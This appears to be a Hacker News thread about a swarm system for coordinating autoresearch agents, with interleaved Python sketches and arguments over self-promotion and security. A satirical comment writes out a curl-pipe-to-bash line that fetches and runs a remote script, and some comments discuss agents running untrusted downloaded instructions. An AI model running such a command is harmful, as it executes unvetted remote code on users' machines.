I was exploring how to parallelize autoresearch workers. The idea is to have a trusted pool of workers who can verify contributions from a much larger untrusted pool. It's backed by a bare git repo and a SQLite database with a simple Go server. It's a bit like a blockchain in that blocks = commits, proof of work = finding a lower val_bpb commit, and reward = a place on the leaderboard. I wouldn't push the analogy too far. It's something I'm experimenting with, but I haven't released it yet (except briefly) because it's not sufficiently simple/canonical. The core problem is how to neatly, and in a general way, organize individual autoresearch threads into swarms, inspired by SETI@home, Folding@home, etc.
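A minimal sketch of the acceptance rule described above, with all names hypothetical (the actual system is not released): an untrusted worker's commit only makes the leaderboard if a trusted worker re-runs the evaluation and confirms a strictly lower val_bpb.

```python
# Hypothetical sketch of the swarm acceptance rule: blocks = commits,
# "proof of work" = a strictly lower val_bpb, reward = a leaderboard
# entry. Names and structure are illustrative, not the real protocol.

def verify(candidate_bpb: float, best_bpb: float, recheck) -> bool:
    """A trusted worker accepts an untrusted submission only if
    re-running the evaluation confirms the claimed improvement."""
    if candidate_bpb >= best_bpb:
        return False                 # no improvement even as claimed
    measured = recheck()             # trusted re-evaluation
    return measured < best_bpb       # the claim must reproduce

leaderboard = []                     # (name, val_bpb), lower is better
best = float("inf")

def submit(name: str, claimed_bpb: float, recheck) -> bool:
    global best
    if verify(claimed_bpb, best, recheck):
        best = claimed_bpb
        leaderboard.append((name, claimed_bpb))
        leaderboard.sort(key=lambda entry: entry[1])
        return True
    return False

# Honest claim: says 3.1, trusted recheck measures 3.1 -> accepted.
submit("worker-a", 3.1, lambda: 3.1)
# Inflated claim: says 2.9, but recheck measures 3.3 -> rejected.
submit("worker-b", 2.9, lambda: 3.3)
print(leaderboard)  # [('worker-a', 3.1)]
```

The key property is that the expensive part (re-evaluation) is only spent on submissions that at least claim an improvement, which is roughly how SETI@home-style projects keep a small trusted core honest against a large untrusted pool.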
Yeah, you can sink a lot of time into a system like that[1]. I spent years simplifying the custom graph database underneath it all and only recently started building it into tools that an agent can actually call[2]. But so far all the groundwork has actually paid off; the picture basically paints itself.
I found a wiki to be a surprisingly powerful tool for an agent to have. And building a bunch of CLI tools that all interconnect on the same knowledge graph substrate has also had a nice compounding effect. (The agent turns themselves are actually stored in the same system, but I haven't gotten around to using that for cool self-referential meta-reasoning capabilities.)
1: https://github.com/triblespace/triblespace-rs
2: https://github.com/triblespace/playground/tree/main/facultie...
I've been seeing this pattern at work and everywhere now
1. someone shares something
2. Great, now look at my stuff.
I don't know if I am noticing this more, or if it has to do with AI making it easy for people to build "my stuff", plus AI Dunning-Kruger.
Hasn't HN been traditionally a place where makers share the experience they had with building things?
Especially when you have someone working on autonomous research agents, it doesn't seem that off to lament how much time you can sink into the underlying substrate. In my particular case the work started long before LLMs, to make actual research easier; the fact that it can also be used by agents for research is just a happy accident.
But since you seem to take so much offence, per https://news.ycombinator.com/item?id=47425470 and your Dunning-Kruger remark: you seem to be somewhat blinded by your aversion to AI-assisted engineering, because if https://github.com/triblespace/triblespace-rs is a "shitty vibecoded project", then I don't know what a good project actually looks like to you. That codebase has years of human blood, sweat, and tears in it. It implements novel data structures, has its own worst-case-optimal (WCO) join algorithm, cutting-edge succinct data structures that are hand-rolled to supplement it, new ideas on graph-based RDF-like CRDTs, efficient graph canonicalisation, content addressing and metadata management. It implements row types in Rust, has really polished typed queries that seamlessly integrate into Rust's type system, lockless left-right data structures, and a single-file database format where concatenation is database union, and it is orders of magnitude faster than similar databases like Oxigraph... does it also have to cure cancer and suck you off to meet your bar?
You just seem like a hater.
Have you thought about ways to include the sessions / reasoning traces from agents in this storage layer? I can imagine a RAG system on top of that, plus LLM publications, could help future agents figure out how to get around problems that previous runs ran into.
Could serve as an annealing step - trying a different earlier branch in reasoning if new information increases the value of that path.
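One way to read that suggestion, as a toy sketch (entirely hypothetical, not from the project): keep abandoned reasoning branches in a priority queue scored by estimated value, and re-expand an earlier branch once new information raises its score above the current frontier.

```python
import heapq

# Toy sketch of the "annealing" idea above: abandoned branches sit in
# a max-heap keyed by estimated value; new information can raise a
# branch's value, so an earlier branch may be revisited. All names
# are illustrative.

class BranchPool:
    def __init__(self):
        self._heap = []       # entries of (-value, branch_id)
        self._value = {}      # branch_id -> current estimate

    def add(self, branch_id: str, value: float) -> None:
        self._value[branch_id] = value
        heapq.heappush(self._heap, (-value, branch_id))

    def update(self, branch_id: str, new_value: float) -> None:
        """New information changes a branch's estimated value.
        We push a fresh entry; stale ones are skipped lazily."""
        self._value[branch_id] = new_value
        heapq.heappush(self._heap, (-new_value, branch_id))

    def pop_best(self) -> str:
        """Return and remove the most promising branch, skipping
        heap entries that no longer match the current estimate."""
        while self._heap:
            neg, bid = heapq.heappop(self._heap)
            if self._value.get(bid) == -neg:
                del self._value[bid]
                return bid
        raise IndexError("no branches left")

pool = BranchPool()
pool.add("branch-early", 0.2)      # abandoned early on
pool.add("branch-current", 0.6)
pool.update("branch-early", 0.9)   # new info makes it attractive again
print(pool.pop_best())  # branch-early
```

The lazy-deletion pattern (push updated entries, discard stale ones on pop) is a standard way to get updatable priorities out of a plain binary heap without a decrease-key operation.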
No HTTPS in 2026. A false origin that suggests a massive improvement. The leaderboard doesn't work. The instructions are "repeatedly download this code and execute it on your machine". No way to see the actual changes being made.
We can do better than this as an industry, or at least we used to be better at this. Where's the taste?
Don’t mean to pick on you specifically, but this comment feels like a pretty good distillation of a certain mindset you often see in Googlers:
* we know better
* we judge everything against internal big-company standards
* we speak as if we’re setting the bar for “the industry”
Someone is openly pushing on a frontier, sharing rough experiments, and educating a huge number of people in the process — and the response is: “we can do better than this as an industry.”
Can you? When is Google launching something like this?
People are going to eat this up just because Karpathy is involved. This space is easily misled by hero worship.
I mean do you really need that stuff for this? I’m just gonna fetch it from a sandbox anyway.
I'm not the OP, though it seems the context for this is (via @esotericpigeon):
https://github.com/karpathy/autoresearch/pull/92
Who knows. The site has no HTTPS, and I don't know what it is training or why.
I'm curious what a "stripped down version" of Github can offer in terms of functionality that Github does not? Is it not simpler to have the agents register as Github repos since the infrastructure is already in place?
So, if I understand correctly, this is about finding the optimal (or at least a better one) GPT architecture?
Anyway, "1980 experiments, 6 improvements" makes me wonder whether this is better than a random search or some simple heuristic.
I tried to copy the instructions and paste them into Notes to see what they said, but I could not. Either the clipboard was empty or something prevented Notes from recognizing it as plain text.
It worked for me; try again. But it is still not fully clear to me what this is supposed to do, nor whether it does better than a random search. It looks like it is about optimizing a GPT architecture.
You guys are really going to copy and paste a prompt into your Claude CLI, which may or may not be set up with sandbox/tool permissions?
Just install my software to detect bad prompt strings first.
`curl -L https://mycoolsvc.com/r4nd0mus3r/mycoolsoftware/master/insta... | bash`
Hey wait a minute.. that guy’s not the wallet inspector!
It’s like the old days when you opened up Kazaa and downloaded smooth_criminal_alien_ant_farm.mp3.exe
You can (and should) read the prompt first. Just paste it inside a text editor.
Yolo mode activated.
For science!
What is this?
Seems like a shameless rip of the below, theme and all?
https://www.ensue-network.ai/autoresearch
Take a look at the GitHub repo: "forked from karpathy/autoresearch"
That is a different thing. Both are forks, but the one linked here is the same shared hub.
Both built by Claude Sonnet 4.6